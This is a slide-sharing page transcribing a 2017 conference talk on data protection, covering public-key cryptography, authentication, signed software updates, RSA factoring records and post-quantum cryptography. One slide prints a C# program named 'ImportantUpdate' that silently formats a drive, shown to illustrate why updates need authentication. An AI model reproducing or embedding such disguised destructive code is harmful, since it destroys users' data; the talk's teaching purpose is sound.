Data protection in the cyber space

Slides:



Advertisements
Similar presentations
Module XXI Cryptography
Advertisements

Public Key Infrastructure and Applications
Public Key Infrastructure A Quick Look Inside PKI Technology Investigation Center 3/27/2002.
Department of Information Engineering1 Major Concerns in Electronic Commerce Authentication –there must be proof of identity of the parties in an electronic.
Principles of Information Security, 2nd edition1 Cryptography.
Lesson Title: Introduction to Cryptography Dale R. Thompson Computer Science and Computer Engineering Dept. University of Arkansas
Security on the Internet Jan Damsgaard Dept. of Informatics Copenhagen Business School
TrustPort Public Key Infrastructure. Keep It Secure Table of contents  Security of electronic communications  Using asymmetric cryptography.
Cryptography and Network Security Chapter 11 Fifth Edition by William Stallings Lecture slides by Lawrie Brown.
1 Fluency with Information Technology Lawrence Snyder Chapter 17 Privacy & Digital Security Encryption.
Lecture 12 Electronic Business (MGT-485). Recap – Lecture 11 E-Commerce Security Environment Security Threats in E-commerce Technology Solutions.
Information Security for Managers (Master MIS)
Using cryptography to protect data in networks. Summary National Taras Shevchenko University of Kiev Ukraine Vsevolod Ievgiienko.
Cryptography  Why Cryptography  Symmetric Encryption  Key exchange  Public-Key Cryptography  Key exchange  Certification.
Cryptography, Authentication and Digital Signatures
ECE Lecture 1 Security Services.
Chapter 16 Security Introduction to CS 1 st Semester, 2012 Sanghyun Park.
Symmetric Cryptography, Asymmetric Cryptography, and Digital Signatures.
Advanced Database Course (ESED5204) Eng. Hanan Alyazji University of Palestine Software Engineering Department.
Encryption Basics Module 7 Section 2. History of Encryption Secret - NSA National Security Agency –has powerful computers - break codes –monitors all.
Deck 10 Accounting Information Systems Romney and Steinbart Linda Batch March 2012.
1 Network Security: Introduction Behzad Akbari Fall 2009 In the Name of the Most High.
Secure Instant Messenger in Android Name: Shamik Roy Chowdhury.
Lecture 6 (Chapter 16,17,18) Network and Internet Security Prepared by Dr. Lamiaa M. Elshenawy 1.
Lecture 8 (Chapter 18) Electronic Mail Security Prepared by Dr. Lamiaa M. Elshenawy 1.
 Introduction  History  What is Digital Signature  Why Digital Signature  Basic Requirements  How the Technology Works  Approaches.
Information Security and Privacy By: Mike Battestilli.
Security Issues in Information Technology
Securing Information Systems
Key management issues in PGP
Web Applications Security Cryptography 1
Electronic mail security
USAGE OF CRYPTOGRAPHY IN NETWORK SECURITY
Cryptography Why Cryptography Symmetric Encryption
Internet Trading System
NETWORK SECURITY Cryptography By: Abdulmalik Kohaji.
Secure Sockets Layer (SSL)
Cryptographic Hash Function
e-Health Platform End 2 End encryption
B. R. Chandavarkar CSE Dept., NITK Surathkal
Presented by, K.K.Radhika.
Public Key Encryption and the RSA Algorithm
Instructor Materials Chapter 5: The Art of Ensuring Integrity
Big Numbers: Mathematics and Internet Commerce
Basic Network Encryption
OLMEK Building a confidential and secure communication between a Bank and its customers March 2006.
S/MIME T ANANDHAN.
Digital Signature.
IS3230 Access Security Unit 9 PKI and Encryption
Pooja programmer,cse department
Confidentiality and Privacy Controls
Chapt. 10 – Key Management Dr. Wayne Summers
Asymmetric Cryptography
ELECTRONIC MAIL SECURITY
Security.
ELECTRONIC MAIL SECURITY
csci5233 computer security & integrity (Chap. 4)
Instructor Materials Chapter 5: The Art of Ensuring Integrity
Install AD Certificate Services
Chapter -7 CRYPTOGRAPHIC HASH FUNCTIONS
ONLINE SECURE DATA SERVICE
Public-Key, Digital Signatures, Management, Security
Chapter 3 - Public-Key Cryptography & Authentication
Basic Network Encryption
Production and usage of Cryptocurrencies
Electronic Payment Security Technologies
Instructor Materials Chapter 5: Ensuring Integrity
Fluency with Information Technology Lawrence Snyder
Operating Systems Concepts
10/7/2019 Created by Omeed Mustafa 1 st Semester M.Sc (Computer Science department) Cyber-Security.
Presentation transcript:

Data protection in the cyber space Attila Pethő University of Debrecen 8th International Conference on Cognitive Infocommunication Debrecen, September 11-14, 2017. The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

The world’s technological capacity store communicate compute information. The World's Technological Capacity to Store, Communicate, and Compute Information, Martin Hilbert and Priscila López, 2011 The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

1986 1993 2000 2007 Annual growth rate Storage Installed capacity MB/year % digital 539 0.8 % 2,866 3 % 8,988 25 % 44,716 94 % 23 % Broadcast Effective capacity MB/day 241 0.0 % 356 520 7.3 % 784 6 % Telecom % digitsl 0.16 19.8 % 0.23 68.5 % 1.01 97.7 % 27 99.9 % 28 % General-purpose computation Installed capacity MIPS/year 0.06 0.8 48 968 58 % Application-specific computation 0.09 3.3 239 28,620 83 % The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

The work/publication is supported by the EFOP-3. 6 The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Digital data Easy and uniform handling Adventage: same technology for all kind of data (text, voice, photo, movie, etc.) during storage transmission transformation Disadventage: the same  easy to alter, to forge, etc. The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Protection physical human  social engineering (!) technological  private- and public key cryptography administrative legal etc. The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Goals and tools of information security availability  authentication, integrity, authenticity digital signature, confidentiality  encryption The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Discoverer of public key cryptography Martin E. Hellman Whitfield Diffie New Directions in Cryptography, IEEE Trans on Inform. Theory, November 1976 The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

They wrote 41 years ago […] applications create a need for new types of cryptographic systems which minimize the necessity of secure key distribution channels and supply the equivalent of a written signature. The development of computer controlled communication networks promise effortless and inexpensive contact between people or computers on opposite sides of the world, replacing most mail and many excursions with telecommunications. This is now reality. We have an efficient and global public key infrastructure. The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Security paradox The Internet is a huge public network, everybody may join it. Have to solve authentication of users, Control of the integrity and authenticity of documents, Key exchange, Encryption of confidential documents. The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Authentication of users A process where the confidence for user identities is established and presented via electronic methods to an information system. The proof is a unique, confidental data, which is sending through the public Internet. Humans have biometric identifiers. Softwares, drones, gadgets, etc. Only password like identifiers!? How will identify theirself the nanorobots? The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Integrity and authenticity The document did not changed during the transmission, and the source is authentic. It was, and is vital for the development of Internet that the users receive the new softwares and their latest versions authentic. Pozitive feedback. Refreshing of softwares of cars  in garages. Slow and expensive. The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Update 1 The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Update 2 The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Update 3 The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Update 4 The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Frissítés 4 The recommendation of 2048 bit key length is 20 years old! The engineers were more pessimistic as the mathematicians. The largest factorized RSA numbers: 1994: 256 bit 1999: 512 bit 2009: 768 bit 2016: the same The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Why we need this complicated process? Because one can erase the discs with a simple code! The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

using System.Collections.Generic; using System.Linq; using System.Text;   namespace ImportantUpdate { class Run { public static void Main(String[]args) { FormatDrive('E'); } public static void FormatDrive( char driveLetter, string fileSystem = "NTFS", bool quickFormat = true) { string drive = driveLetter + ":"; var di = new System.IO.DriveInfo(drive); var process = new System.Diagnostics.ProcessStartInfo(); process.FileName = "format.com"; process.WorkingDirectory = Environment.SystemDirectory; process.Arguments = "/FS:" + fileSystem + " /Y" + (quickFormat ? " /Q" : "") + " " + drive; process.UseShellExecute = false; process.CreateNoWindow = true; var formatProcess = System.Diagnostics.Process.Start(process); }  The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Encryption Seemingly we never use it. We often transmit confidential information: Bank transfer Data on our helth Invoice, tax declaration, etc. Encryption happen in background. The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Post quantum cryptography Our common public key cryptographic algorithms – RSA, ECC, etc. – can be broken with quantum algorithms (Shor, 1994). With the Shor algorithm factorized largest number is: 15. There exist quantum resistent public key cryptographic algorithms, but they have very large key length and they can be used only on powerfull computers. The IoT requires lightweight cryptographic algorithms! The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.

Thank you for your attention! The work/publication is supported by the EFOP-3.6.1-16-2016-00022 project. The project is co-financed by the European Union and the European Social Fund.